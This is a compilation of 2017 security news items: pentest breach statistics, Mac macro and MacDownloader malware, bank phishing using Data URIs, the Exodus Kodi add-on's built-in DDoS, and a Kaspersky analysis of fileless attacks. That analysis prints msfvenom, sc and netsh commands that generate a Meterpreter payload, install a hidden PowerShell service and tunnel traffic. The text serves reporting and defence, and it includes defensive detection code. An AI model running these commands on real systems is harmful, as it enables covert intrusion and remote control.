The study was published shortly after a member of the Chrome security team and a former Mozilla employee said the only antivirus that is not terrible is the one made by Microsoft.


Two-thirds of Enterprises Usually Breached by White Hat Hackers

8.2.2017 Securityweek Hacking
Analysis of 128 penetration tests conducted in the fourth quarter of 2016 shows that approximately two-thirds of tested companies were successfully breached. This is despite the limited time -- in 89% of cases, less than two weeks -- available to the pentesters compared to the effectively unlimited time available to blackhat attackers.

Rapid7, which was appointed a CVE numbering authority in December 2016, analyzed 128 of the engagements it undertook in the closing months of last year. These involved both internal and external testing. In most cases the client company was more interested in external testing (67.2%) than in internal testing (21.1%). A few (8.6%) combined both internal and external tests, while a smaller number of tests (3.1%) were neither (code and IoT audits, for example).

External pentests involved testing web sites, phishing, VPNs and so on. Internal tests looked at, for example, network misconfigurations, software, and wifi. Although there were fewer internal tests, states Rapid7, "Overall, penetration testers successfully compromised the target organization through software vulnerabilities or network misconfigurations just over 80% of the time."

The good news, it added, is that "most of the techniques used can be defended against with sensible, widely understood and appropriately tailored network security best practices, including patch management, network segmentation, and regular assessments of the most likely sources of risk in the enterprise."

Pentesters are usually asked to evaluate protection in specific areas. Unsurprisingly, given the increasing scope of regulations, the most frequent request (57% of the companies tested) is to test against the theft of personally identifiable information (PII). This is followed by sensitive internal data at 55.5%. And yet, "despite the recent uptick in online industrial espionage, the surveyed organizations seemed the least interested in specifically protecting copyrighted material [2.3%], digital certificates [3.1%], source code [9.4%], or trade secrets [13.1%]."

It is tempting to infer from this that compliance pressures are focusing defense of PII over purely business secrets. Indeed, Rapid7 director of research, Tod Beardsley, told SecurityWeek, "It was surprising that companies are focusing so much attention on protecting PII, given that real criminals have such a variety of goals, including an increased interest in industrial espionage. We do think that this is due to compliance requirements that mandate PII protections, and therefore, organizations are dedicating their limited resources to making sure their PII story is solid. This is certainly rational, but we worry that organizations are growing too focused on PII protections while criminals are expanding their areas of interest."

The report highlights the value of protecting credentials. "The number one method of obtaining account access," it states, "starts with very simple password guessing; enforcing more machine-generated, rather than human-generated, passwords would go a long way toward defending against this threat, as would more widespread adoption of two-factor authentication."

Rapid7 outlines the methods it uses to 'acquire' client credentials. The most common, and the most successful, is manual guesswork. "Here's a time-saving tip," it comments: "If you know a lot of, or all, usernames, just try <Current season><current year>. People love that password, and according to our survey data, manually guessing patterns like this is successful a surprising (depressing?) fraction of the time."

The two most common methods of defending credentials are account lock-outs and two-factor authentication. However, 32.8% of enterprises did not use lockouts, while for another 42.2% the lockout had no effect or simply delayed the compromise. Rapid7 points out that 14% of the surveyed sites also lacked detection controls. "Combined with a lack of effective lockouts, this is a prescription for inevitable compromise."

Two-factor authentication (2FA) is a more effective way of protecting credentials, but it is surprisingly rare. "2FA is generally effective in preventing the most common forms of credential compromise, especially when combined with a reasonable detection control like user behavior analytics," says Rapid7.
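The two defensive points made above, rejecting the season-plus-year passwords the report singles out and detecting a password spray that stays below per-account lockout thresholds, as an added example that is not Rapid7's code. The log format, addresses and user names are constructed.

```python
"""Two defender-side controls for the credential attacks in the Rapid7 report.

Added example, not Rapid7's code. (1) A password-policy test that rejects the
<Season><Year> pattern the report singles out. (2) A password-spray detector
over authentication logs: a spray tries one or two passwords against many
accounts, so a per-account lockout threshold never trips; the detector instead
counts distinct accounts failed from one source inside a time window. The log
format, addresses and user names are constructed for the example.
"""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

SEASON_YEAR = re.compile(
    r"(spring|summer|autumn|fall|winter)[-_.]?(19|20)\d{2}[!?.@#$]?",
    re.IGNORECASE,
)


def is_seasonal_password(password):
    """True for Winter2017, Summer_2016! and similar season-plus-year strings,
    which satisfy complexity rules and are the first guess of a spray."""
    return SEASON_YEAR.fullmatch(password) is not None


@dataclass
class AuthEvent:
    ts: datetime
    src: str
    user: str
    result: str   # "OK" or "FAIL"


LINE = re.compile(r"(\S+) src=(\S+) user=(\S+) result=(OK|FAIL)")


def parse_log(text):
    """Parse the constructed 'timestamp src= user= result=' log format."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            events.append(AuthEvent(ts, m.group(2), m.group(3), m.group(4)))
    return events


def detect_sprays(events, window=timedelta(minutes=10), min_accounts=5,
                  lockout_threshold=3):
    """Return {source: {"failed_accounts": [...], "successes": [...]}} for
    sources that fail against at least min_accounts distinct users inside
    `window` while staying below lockout_threshold on every single account.
    Successful logins from a spraying source are reported as likely
    compromises."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev.src].append(ev)
    alerts = {}
    for src, evs in by_src.items():
        fails = sorted((e for e in evs if e.result == "FAIL"), key=lambda e: e.ts)
        targeted = set()
        start = 0
        for end in range(len(fails)):
            while fails[end].ts - fails[start].ts > window:
                start += 1
            per_user = Counter(e.user for e in fails[start:end + 1])
            if (len(per_user) >= min_accounts
                    and max(per_user.values()) < lockout_threshold):
                targeted.update(per_user)
        if targeted:
            successes = sorted({e.user for e in evs if e.result == "OK"})
            alerts[src] = {"failed_accounts": sorted(targeted),
                           "successes": successes}
    return alerts


# Constructed sample log: one spray across six accounts that finally succeeds,
# one brute force against a single account (caught by lockout, not by this
# detector), and one legitimate user who mistypes once.
SAMPLE_LOG = """\
2017-02-08T09:00:01Z src=203.0.113.7 user=alice result=FAIL
2017-02-08T09:00:03Z src=203.0.113.7 user=bob result=FAIL
2017-02-08T09:00:05Z src=203.0.113.7 user=carol result=FAIL
2017-02-08T09:00:07Z src=203.0.113.7 user=dave result=FAIL
2017-02-08T09:00:09Z src=203.0.113.7 user=erin result=FAIL
2017-02-08T09:00:11Z src=203.0.113.7 user=frank result=OK
2017-02-08T09:01:00Z src=198.51.100.9 user=alice result=FAIL
2017-02-08T09:01:01Z src=198.51.100.9 user=alice result=FAIL
2017-02-08T09:01:02Z src=198.51.100.9 user=alice result=FAIL
2017-02-08T09:01:03Z src=198.51.100.9 user=alice result=FAIL
2017-02-08T09:05:00Z src=192.0.2.5 user=grace result=FAIL
2017-02-08T09:05:20Z src=192.0.2.5 user=grace result=OK
"""

if __name__ == "__main__":
    for src, info in detect_sprays(parse_log(SAMPLE_LOG)).items():
        print(src, info)
    print(is_seasonal_password("Winter2017"))
```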

Once an account is compromised, both pentesters and attackers will seek to locate and use more privileged credentials. Such a process is described in one of several case studies outlined in the report. This client was a technology company. Rapid7 detailed "how good information gathering, coupled with precise password sprays, can ultimately result in going from an unauthenticated nobody on the internet, to an authenticated user on the Domain, and ultimately to a Domain Administrator."

The first step was to search the internet for names or usernames and the potential username format. "This username enumeration technique produced several valid accounts in the domain, which were then re-run through a brute-force attack against the OWA installation using that favorite password of pen testers, <CurrentSeason><CurrentYear>. This attack produced several valid credential pairs."

2FA was in use, connected to a VPN endpoint, but Rapid7 bypassed it by changing the e-mail address on a compromised account to one controlled by Rapid7 and using the VPN's self-service enrollment feature. This got the pentesters into the network, and they then scanned the internal hosts until they found an old Group Policy Preferences file containing service account credentials vulnerable to trivial decryption. "This user was a Domain Administrator on the network," reports Rapid7, "and therefore Rapid7 had fully compromised this domain upon connecting to the domain controller with this account."

Rapid7 is concerned at the consistency with which it can compromise its clients. There seems to be no difference between small companies with a small attack surface, and large enterprises with a large attack surface. "Over two-thirds of [our] penetration testers remain undetected," it concludes. "Beyond network segmentation, patch management, or any other technical countermeasure, a routine malicious behavior detection strategy that is at least able to catch these frenetic bursts of malicious activity is the best technical protection solution money can buy today."


Macro Malware Comes to macOS

8.2.2017 Securityweek Virus
After becoming a common occurrence on Windows-based computers over the past few years, malware that abuses macro-enabled Microsoft Office documents to spread is now targeting macOS users too.

Malicious macros in Office documents have been used to spread malware for over a decade, but their use dropped significantly after Microsoft disabled macros by default in Office 2007. A couple of years ago, however, the use of such macros recommenced, as cybercriminals started leveraging various social engineering techniques to trick users into enabling the macros.

Until now, only Windows users were targeted in such attacks, but it appears that actors building malware for Mac systems also decided to adopt the technique recently. According to Patrick Wardle, Director of Research at Synack, such an attack was recently carried out via a Word document named “U.S. Allies and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace.docm.”

By using ClamAV's sigtool to extract the embedded macros, the researcher stumbled upon Python code designed to perform a series of checks on the potential victim's machine before it fetches and executes the malicious payload. As soon as the user opens the document in Word for Mac with macros enabled, the Fisher function is automatically executed.

The Fisher function was observed to decode a base64 chunk of data and then execute it via Python. The Python code, which appears to have been copied from the open-source EmPyre project, checks the machine to make sure LittleSnitch is not running, downloads the second-stage payload (from hxxps[:]//www.securitychecking.org:443/index[.]asp), then RC4 decrypts this payload and executes it.

While EmPyre is a known open-source multi-stage post-exploitation agent “built on cryptologically-secure communications,” it’s unknown what the second-stage payload included, as the file wasn’t available during analysis. While it might have been another EmPyre component, this payload could have been something entirely different as well.

"The second-stage component of EmPyre is the persistent agent that affords a remote attacker continuing access to an infected host," the researcher says. Persistence is likely achieved through a cron job, a dylib hijack, a launch daemon, or a login hook.

“The persistent component of EmPyre can also be configured to run a wide range of EmPyre modules. These modules allow the attacker to perform a myriad of nefarious actions such as enabling the webcam, dumping the keychain, and accessing a user's browser history,” the researcher notes.

The IP associated with the securitychecking(.)org website that hosts the malicious payload appears to be geolocated in Russia and was previously associated with phishing.

The malware used in this attack isn't particularly advanced: it relies on the user opening the malicious document in Microsoft Word and enabling macros, and it uses an open-source implant that is likely to be easily detected. The use of social engineering is nonetheless noteworthy, since it exploits the weakest link in the chain, the human element.

“And moreover, since macros are 'legitimate' functionality (vs. say a memory corruption vulnerability), the malware's infection vector doesn't have to worry about crashing the system nor being 'patched' out,” the researcher concludes.


Česká spořitelna warns: cyber attackers are using a new trick with the address
8.2.2017 Živě.cz Phishing
Phishing has been rampant in recent weeks. Fio banka, ČSOB, Alza and also Google, in connection with Gmail, have warned about attacks on their clients. Now Česká spořitelna has joined them, having recorded a new wave of attacks in which the attackers use a new method to confuse users.

Once again everything rests on an e-mail urging the user to view an important message in internet banking. Clicking the link takes the user to a fraudulent login page posing as the legitimate online account management. The entered data, of course, goes to the attackers' database. This time they also try to extract the authorisation code delivered by SMS.

[Figure: The user first receives an e-mail containing a link to an important message in internet banking; the user is then redirected to a fraudulent page impersonating internet banking (photo: Česká spořitelna)]

What is new is a trick that disguises the address of the fake site using a so-called Data URI, which allows a piece of source code to be written into the address itself. Thanks to this, the address bar can contain the familiar text servis24.cz; what should warn the user above all is the absence of a secure connection, which browsers indicate with a green padlock icon.
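A link check of the kind a mail gateway or browser extension could apply to catch the Data URI trick described above, as an added example that is not Česká spořitelna's code. The genuine host www.servis24.cz comes from the article; the sample links, the padding and the collector host are constructed.

```python
"""Link check for the Data URI trick described above.

Added example, not Česká spořitelna's code. A data: URI carries the whole page
inside the address, so the address bar can show familiar text such as
servis24.cz while nothing was fetched from that host and no certificate was
checked (hence no padlock). The checker flags data: links, extracts decoy
domain text and any embedded form target, and for ordinary links verifies
HTTPS and the expected host. The sample links are constructed.
"""
import base64
import re
from urllib.parse import unquote, urlsplit

EXPECTED_HOST = "www.servis24.cz"   # genuine banking host named in the article
DOMAIN_TEXT = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.IGNORECASE)
FORM_ACTION = re.compile(r"""action=["']?([^"'\s>]+)""", re.IGNORECASE)


def parse_data_uri(href):
    """Split a data: URI into (mediatype, decoded payload text)."""
    header, _, payload = href[len("data:"):].partition(",")
    params = header.split(";")
    mediatype = params[0] or "text/plain"
    if "base64" in params[1:]:
        payload = base64.b64decode(unquote(payload)).decode("utf-8", "replace")
    else:
        payload = unquote(payload)
    return mediatype, payload


def check_banking_link(href, expected_host=EXPECTED_HOST):
    """Return {"verdict": "ok" | "suspicious", "reasons": [...]}."""
    reasons = []
    # Registrable name the bank actually uses, e.g. "servis24.cz".
    base_domain = expected_host[4:] if expected_host.startswith("www.") else expected_host
    scheme = href.split(":", 1)[0].lower()
    if scheme == "data":
        mediatype, payload = parse_data_uri(href)
        reasons.append(f"data: URI ({mediatype}): page is embedded in the "
                       "address, nothing is fetched from any host")
        decoys = sorted({d.lower() for d in DOMAIN_TEXT.findall(payload)
                         if d.lower().endswith(base_domain)})
        if decoys:
            reasons.append(f"decoy domain text {decoys} placed in the address")
        m = FORM_ACTION.search(payload)
        if m:
            target = urlsplit(m.group(1)).hostname or m.group(1)
            reasons.append(f"embedded form posts credentials to {target}")
    else:
        host = (urlsplit(href).hostname or "").lower()
        if scheme != "https":
            reasons.append("no TLS: browser shows no padlock")
        if not (host == base_domain or host.endswith("." + base_domain)):
            reasons.append(f"host {host!r} is not {base_domain}")
    return {"verdict": "ok" if not reasons else "suspicious", "reasons": reasons}


# Constructed samples.
LEGIT = "https://www.servis24.cz/ebanking/"
LOOKALIKE = "http://www.servis24.cz.overeni-klienta.example/login"
# The familiar text comes first, padding pushes the real content out of the
# visible part of the address bar, then an HTML form that posts elsewhere.
DATA_URI = ("data:text/html,https://www.servis24.cz/ebanking/" + "%20" * 40
            + '<form action="https://collector.example/post">'
              '<input name="user"><input name="pwd"><input name="sms"></form>')

if __name__ == "__main__":
    for link in (LEGIT, LOOKALIKE, DATA_URI):
        print(check_banking_link(link))
```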

Česká spořitelna asks users to forward fraudulent e-mails to phishing@csas.cz and recommends contacting the customer line immediately if data has already been entered into the fake form.


The author of a well-known Kodi add-on wanted to settle scores, so he built a DDoS into it
8.2.2017 Živě.cz Hacking

The scene around the popular Kodi media player went through an unpleasant affair in recent days. The author of Exodus, one of the popular add-ons for streaming films and TV series from the internet, wanted to use its huge user base to settle scores with his critics and built an attempted DDoS into the add-on's code.

[Figure: The Kodi media player on Android TV]

According to TorrentFreak, the author of Exodus, who went by the nickname Lambda online, was in a dispute with certain critics who wanted to reveal his real identity. As the author of a piracy add-on, Lambda feared this, so in an update he placed several lines of commands into the Exodus code that repeatedly loaded web addresses belonging to his enemies.

[Figure: The Python code that performed HTTP GET requests in a loop. Given the add-on's large number of users, the author hoped to cause trouble and overwhelm the web server.]

Curious users do not miss much, however, and they soon started asking why the add-on was trying to open around forty web connections in the background every time they started streaming anything through it.

Lambda eventually had to admit that he wanted to harm his critics, and he made the function optional for his supporters. But he had gone too far, discredited the whole scene and lost his account in the add-on repository. In the end he effectively left Kodi.

[Figure: Kodi home cinema on Android TV]

The whole case was a reminder that when installing any third-party code we must always bear in mind that an untrustworthy author can abuse it. It need not always be malware meant to cause us real harm; it can be, as in this case, an attempt to enlist us in a DDoS attack.


Internet monitoring by military intelligence: a step in the right direction
8.2.2017 Lupa.cz BigBrother

Today, at a session of the Security Committee, MPs added several important amendments pointing in a positive direction to the bill amending the Military Intelligence Act.
I have commented on the amendment to the Military Intelligence Act (VOZ) several times before, so there is probably no need to repeat that I am not a big fan of this piece of legislation. Personally I think the artificial split between cyber security and cyber defence, and tying this topic to an intelligence service, is a very bad idea. I also argued strongly against VOZ being technically able to obtain all internet traffic data. The safeguard in the law, a declaration that VOZ would not concern itself with content, struck me as weak. Equally, I dislike that experts from outside VOZ or the Ministry of Defence would not be invited to the discussion about deploying the relevant equipment.

Today's Security Committee session brought mildly favourable news. First, the proposed amendment says that VOZ will only be able to obtain metadata. Translated into plain language, this means VOZ will "see" only the headers (envelopes) of messages, not their content. In practice it means they will see, for example, that two mail servers exchanged some message, but they will not know from whom to whom or what was in it. They may also be able to see that someone at a particular IP address accessed, say, the website of Seznam or CZ.NIC, or servers with adult content.


They will not, however, have 100% certainty about who downloaded what there. The IP address in question may serve a company or a household, but unfortunately also just one specific individual. This change also means that deploying an active device through which all traffic would flow is ruled out, as is a passive device eavesdropping on all communication on a given link. In practice it would probably mean that the ISP would send traffic information from its router via NetFlow or sFlow, a fairly common procedure used for network monitoring. It is true, though, that for some ISPs with routers lacking this functionality it may be a technical complication.

The second change concerns the establishment of an advisory body, which should also include experts from among the operators and which would issue expert opinions on the proposed deployment of equipment. I somewhat fault this provision for not stating more clearly who exactly will sit on this body. Practice would clarify it, but I would prefer it to say explicitly that it will include, for example, representatives of the national and governmental CERT teams and so on.

The third change is the publication of an annual report on the measures taken. Again, this is clearly a good step, although it is a bit of a pity that the proposed wording is very brief on this point. I would consider it better if the report also listed the serious attacks that the equipment helped to detect or eliminate.


In any case, I welcome the committee's conclusion. I still think it would be better to ensure this country's cyber defence and security through other mechanisms, but this amendment clearly improves the bill.


Spam is back, at its highest level in 7 years, and one in ten messages contains malware
8.2.2017 Root.cz Spam

Every second, 3,500 unsolicited e-mails are sent worldwide, and one in ten of them is malicious. Spam now makes up more than 65 percent of all mail sent, putting the figures back at 2010 levels.
The volume of spam being sent is growing again. After relatively calm years it has increased several-fold. While in 2015 an average of 500 spam messages were sent per second, today it is 3,500. That, at least, is what the Cisco 2017 Annual Cybersecurity Report shows, confirming information from the Cisco Talos team from September 2016.

Spam volume is growing again
According to the report, attackers' efforts to maximise profit are now clearly visible. The tactics of cyber attackers today resemble business models aimed at maximising profit. They not only exploit new opportunities but also rely on old tricks such as spam, which today accounts for 65% of all e-mails sent, the report says. In volume terms, spam is thus back at the seven-year-old levels of 2010.

Between 8 and 10 percent of spam is, moreover, directly infected with malware, which attackers add as an attachment. All sorts of malicious code spreads this way, and software displaying unwanted advertising is on the rise.

More dangerous unwanted advertising
Malicious software that displays unwanted advertising (adware) is on the rise and is more dangerous than before. Cyber attackers have started using adware as a first step towards infecting systems with a more advanced type of malware. One example is the DNSChanger malware, which lets an attacker control network traffic.

DNSChanger occurs only on devices that were previously infected with adware. Its harmfulness is nevertheless greatly underestimated, and researchers found that in 75% of organisations adware is present on at least one device. 130 organisations of various sizes and across industries were examined.

Attackers are also making more frequent use of online advertising to spread malicious software (malvertising). Malvertising lets attackers rapidly expand the number of potential victims. In such a large-scale campaign they can also switch quickly between the individual servers distributing the malware, reducing the risk of detection. The ShadowGate campaign, for example, attacked millions of users worldwide.

The study also examined the impact of successful cyber attacks on the revenues of not only large companies but also small and medium-sized businesses. Almost a quarter of organisations (22%) hit by a successful attack lost customers, and 40% of those lost more than a fifth of their customer base. Their revenues fell similarly: 29% of successfully attacked organisations recorded lower revenues, and 38% of those lost more than 20% of turnover. "Although the losses caused by cyber attacks are significant, our study found that up to 44% of security incidents remain ignored and are not investigated further. A thorough analysis of an attack that has been weathered is essential if an organisation is to improve its security measures," says Milan Habrcetl, security expert at Cisco ČR.

The most widespread exploit kits are retreating, new ones are arriving
The study found that the most widespread tools for distributing malicious software (exploit kits) have almost disappeared. The Angler, Nuclear, Neutrino and RIG exploit kits used to be among the most used. In November 2016, however, RIG was the only one still active.

The retreat of the Angler exploit kit is connected with the arrest in spring 2016 of 50 Russian hackers who used the Lurk malware to attack Russian banks. Cisco researchers found a close link between the Lurk malware and the Angler exploit kit.

This does not, however, mean reduced attacker activity. Other kits are taking their place, for example Sundown, Sweet Orange and Magnitude. Like RIG, these exploit kits target vulnerabilities in Microsoft Internet Explorer, Flash and the Silverlight application platform.

Many different solutions and the cloud
The study's findings show that 55% of organisations use security solutions from more than 5 vendors, and 3% of organisations even stated that they have products from more than 50 vendors. The complexity of the security architecture can, paradoxically, help attackers, who gain more time and space to launch an attack. Not all solutions are compatible, and not all devices on the network are protected by all the installed security products.

Such a situation also makes it harder for organisations to find security experts, since working with many tools significantly raises the qualifications required of staff. "And it is precisely the shortage of experts that security directors perceive as one of the main constraints on building quality security," says Milan Habrcetl. In the survey, 25% of respondents confirmed this. Other constraints mentioned were a limited budget (38%), system compatibility problems (28%) and required certifications (25%).

At the same time the number of cloud applications being deployed is increasing. The number of cloud applications used by employees has grown more than tenfold in two years. Cisco's CloudLock security team examined 900 organisations: in October 2014 their employees used a total of 20,400 different cloud applications, while in October 2016 it was roughly 222,000. More than a quarter of these (27%) were assessed as high risk. Securing the growing volume of cloud traffic is thus among the main concerns of security managers.



Russia Detains Nine 'Hackers' Over $17 Million Bank Thefts

8.2.2017 Securityweek Hacking
Russia has detained nine people alleged to be part of a cybercrime ring accused of stealing some $17 million dollars from bank accounts, the interior ministry said Wednesday.

The detentions followed a nationwide manhunt. The FSB security agency launched a major operation last year against the alleged 50-strong "hacker group" that pilfered more than one billion rubles ($16.8 million, 15.8 million euros) since 2013, the statement said.

"Nine individuals suspected of participating in hacking attacks were detained on January 25," ministry spokeswoman Irina Volk said. One was placed under arrest.

A total of 27 members and organizers are being investigated, with 19 of them now under arrest in pre-trial jail, the ministry said.

Unnamed security sources on Wednesday told Russian agencies that the latest arrests are connected to a case against legendary hacking collective Lurk that was targeted by law enforcement agencies in a sweep last year.

According to cybersecurity giant Kaspersky, the group was reportedly suspected of stealing some three billion rubles from commercial organisations that included banks.

Russian hackers are in the spotlight over their alleged involvement in cyberattacks targeting the US presidential election campaign but experts say the vast majority of cybercrime in the country is financial.

The FSB itself is also currently caught up in another murky scandal that has seen at least two of its top cybersecurity experts arrested for treason linked to the United States, a lawyer involved in the case has said.

That treason case has also seen the arrest of Ruslan Stoyanov -- the head of Kaspersky's cybersecurity unit that probed Lurk.


Sophos to Acquire Invincea for up to $120 Million

8.2.2017 Securityweek Virus
IT security firm Sophos announced on Wednesday that it has agreed to acquire Invincea, a provider of endpoint security solutions that leverage virtual containers to protect against advanced malware and other threats.

Under the terms of the agreement Sophos will pay $100 million in cash to buy the endpoint protection firm, with a possible $20 million earn-out.

Headquartered in Fairfax, Va., Invincea was founded by chief executive officer Anup Ghosh, and has raised more than $50 million in funding.

Invincea’s flagship product, X, uses “deep learning neural networks and behavioral monitoring” to detect previously unseen malware and stop attacks.

According to Kris Hagerman, chief executive officer at Sophos, Invincea’s technology will strengthen Sophos' recently launched Intercept X product, which includes a set of next-generation technologies such as signature-less anti-malware, anti-exploit and anti-ransomware protection.

“The Invincea machine learning malware detection and prevention technology will be fully integrated into the Sophos endpoint protection portfolio,” Sophos explained. “The availability of Invincea technology through the Sophos Central security management platform will further enhance the Sophos synchronized security portfolio and real-time intelligence sharing.”

"Invincea was created to address sophisticated threats from nation state actors and cyber criminals that were successfully evading traditional network and antivirus solutions," Ghosh wrote in a blog post. "We understood that signature based defenses were nearing the end of their useful life, and alternative non-signature based solutions were needed."

Norm Laudermilch, chief operating officer and head of product development at Invincea added, "Invincea set out to disrupt the traditional approach to antivirus, and even now no single technology is enough to fully protect customers. I share the Sophos vision for bringing together a powerful ensemble of next-gen technologies to dramatically improve the overall effectiveness of endpoint protection. Along with our world-class technical team at Invincea, I'm looking forward to joining Sophos and helping deliver on this ambitious and exciting vision."

Sophos said it would retain Invincea’s office in Fairfax, and Ghosh and COO Norm Laudermilch will join Sophos in key leadership positions.

For Invincea customers, the Invincea endpoint security portfolio will continue to be supported and sold by Invincea and available via Invincea's channel partners.

Invincea Labs, a division of Invincea that invents, prototypes and engineers technologies for government and industry, has been separately managed and operated since 2012, and is not part of this transaction.


Iranian hackers are back with the MacDownloader Mac malware
8.2.2017 Securityweek Apple

An Iranian espionage group has been using an unsophisticated strain of malware, dubbed MacDownloader, to steal credentials and other data from Mac users.
A cyber espionage group linked to the Iranian Government has been using an unsophisticated strain of malware, dubbed MacDownloader, to steal credentials and other data from Mac computers.

The researchers Claudio Guarnieri and Collin Anderson have analyzed the malicious code that was disguised by nation-state hackers as a Flash Player update and a Bitdefender adware removal tool.

The attacks analyzed by the two researchers were mainly focused on the defense industrial base sector, but it is known that the same threat was used against a human rights advocate.

According to the researchers, the malware was "poorly" developed toward the end of 2016, and the experts noticed that its code was copied from other sources. At the time the analysis was written, MacDownloader was not detected by any of the scanning engines on VirusTotal; at the time of writing this article, only about a dozen vendors recognized the bogus Flash Player and Bitdefender apps as a threat.

Once the MacDownloader infects a device, the malware collects information about the host, including passwords stored in the Keychain.

“MacDownloader seems to be poorly developed and created towards the end of 2016, potentially a first attempt from an amateur developer. In multiple cases, the code used has been copied from elsewhere. The simple activity of downloading the remote file appears to have been sourced from a cheat sheet. The main purpose of MacDownloader seems to be to perform an initial profiling of the infected system and collection of credentials from macOS’s Keychain password manager – which mirrors the focus of Windows malware developed by the same actors.” reads the analysis published by the security duo.

The malicious code was first spotted on a fake website of the aerospace firm United Technologies Corporation, the same site that was used in the past to spread Windows malware and the Browser Exploitation Framework (BeEF).

The malware researchers linked the MacDownloader with the activity of an Iranian threat actor known as Charming Kitten (aka Newscaster and NewsBeef).

The Newscaster group made the headlines in 2014 when experts at iSIGHT issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Iranian hackers used a network of fake accounts (the NEWSCASTER network) on major social media platforms to spy on US officials and political staff worldwide, according to an analysis by iSIGHT Partners. The Charming Kitten group is also known for abusing open source security tools, including BeEF.

The analysis of the malware revealed that the authors attempted to implement remote update and persistence capabilities, but neither feature works.

“It appears that the application contains an unused attempt to install persistent access to the victim host. One segment provides a poorly-implemented shell script to save a response from the C2 and mark it for persistence by writing an entry in the /etc/rc.common file. In theory, every time the infected computer would start up, the shell script would be launched to download a file from a remote location, check if it changed from the previous iteration, and if so execute that new implant. While we haven’t managed to obtain a proper response from the server before it was taken offline, our initial investigation did not find a subsequent implant.” states the analysis.

The experts have collected evidence that links the malware to other Iranian threat actors, including the Iran Cyber Security Group and Flying Kitten (aka Rocket Kitten).


“Of particular note are wireless networks named Jok3r and mb_1986. Jok3r corresponds with a member of a defacement group, Iran Cyber Security Group, who continues to be fairly active in vandalizing sites. Iran Cyber Security Group also, as with many other defacement groups later identified as involved in state-aligned campaigns, purports to provide commercial security services and penetration testing training.” states the report.

“The ‘mb_1986’ wireless name is more interesting, as it provides a connection to earlier Iranian campaigns, overlapping with the Flying Kitten actor group and subsequent malware activity in summer 2014.”

The report also includes the IoCs, enjoy it!


Absolute Extends Self-Healing Capabilities to Third-Party Software

8.2.2017 securityweek Security
Vancouver, Canada-based endpoint security company Absolute announced this week the launch of a new product that provides self-healing capabilities to third-party security and management applications.

Absolute’s Persistence technology is embedded in the firmware of over one billion PCs and mobile devices from manufacturers such as Dell, ASUS, HP, Microsoft, Lenovo, Acer, Samsung, Toshiba, Panasonic and Fujitsu. This approach aims to ensure that IT teams are provided uncompromised visibility and real-time remediation capabilities for devices, data and applications.

The company’s Absolute Device & Data Security (DDS) product is designed to allow organizations to monitor endpoints and data stored on computers and cloud storage devices, and quickly address incidents.

Absolute has now announced the availability of Application Persistence, a product that provides self-healing capabilities to third-party endpoint controls, including antiviruses, VPNs, encryption, and management tools.

A recent study has shown that more than half of enterprises have at least six agents installed on their endpoints, and when one of these agents is removed or compromised, the organization can remain exposed to further attacks.

Absolute’s technology aims to address the risk by allowing endpoint agents to repair themselves when removed or compromised by external actors or insider threats, giving enterprises more control over their endpoints, including improved visibility and real-time remediation. Furthermore, it provides IT teams the capabilities needed to ensure that compliance requirements are met.

The company says the self-healing capabilities work even if the machine is not on the corporate network, its firmware is flashed, the hard drive is replaced, or the operating system is reinstalled.

Absolute said its Application Persistence product has already been tested by organizations in the healthcare, financial services and manufacturing industries. The product is available worldwide to enterprises, OEMs, security firms, and independent software vendors (ISVs).


Fileless attacks against enterprise networks
8.2.2017 Kaspersky Virus
During incident response, a team of security specialists needs to follow the artefacts that attackers have left in the network. Artefacts are stored in logs, memory and hard drives. Unfortunately, each of these storage media has a limited timeframe during which the required data is available. One reboot of an attacked computer will make memory acquisition useless. Several months after an attack the analysis of logs becomes a gamble because they are rotated over time. Hard drives store a lot of needed data and, depending on the system’s activity, forensic specialists may extract data up to a year after an incident. That’s why attackers are using anti-forensic techniques (or simply SDELETE) and memory-based malware to hide their activity during data acquisition. A good example of the implementation of such techniques is Duqu2. After dropping onto the hard drive and starting its malicious MSI package, it removes the package from the hard drive by renaming the file and leaves part of itself in memory together with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that attackers install in the network. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that; Duqu2 used a special driver. Now you may understand why we were very excited and impressed when, during an incident response, we found that memory-based malware and tunnelling were implemented by attackers using standard Windows utilities like “SC” and “NETSH“.

Description

This threat was originally discovered by a bank’s security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC). Kaspersky Lab’s product detection names for this kind of threat are MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. Kaspersky Lab participated in the forensic analysis after this attack was detected, discovering the use of PowerShell scripts within the Windows registry. Additionally, it was discovered that the NETSH utility was used for tunnelling traffic from the victim’s host to the attacker’s C2.

We know that the Metasploit framework was used to generate scripts like the following one:

 

This script allocates memory, resolves Windows APIs and downloads the Meterpreter utility directly into RAM. Scripts of this kind may be generated with the Metasploit msfvenom utility using the following command line options:

msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd
After the successful generation of a script, the attackers used the SC utility to install a malicious service (that will execute the previous script) on the target host. This can be done, for example, using the following command:

sc \\target_name create ATITscUA binpath= "C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…" start= manual
The next step after installing the malicious service would be to set up tunnels to access the infected machine from remote hosts, for example using the following command:

netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0
That would result in all network traffic from 10.10.1.11:4444 being forwarded to 10.10.1.12:8080. This technique of setting up proxy tunnels will provide the attackers with the ability to control any PowerShell infected host from remote Internet hosts.

The use of the “SC” and “NETSH” utilities requires administrator privileges on both the local and the remote host. The use of malicious PowerShell scripts also requires privilege escalation and execution policy changes. In order to achieve this, the attackers used credentials of service accounts with administrative privileges (for example backup, the remote task scheduler service, etc.) grabbed with Mimikatz.
 

Features

The analysis of memory dumps and Windows registries from affected machines allowed us to restore both Meterpreter and Mimikatz. These tools were used to collect passwords of system administrators and for the remote administration of infected hosts.

In order to get the PowerShell payload used by the attackers from the memory dumps, we used the following BASH commands:

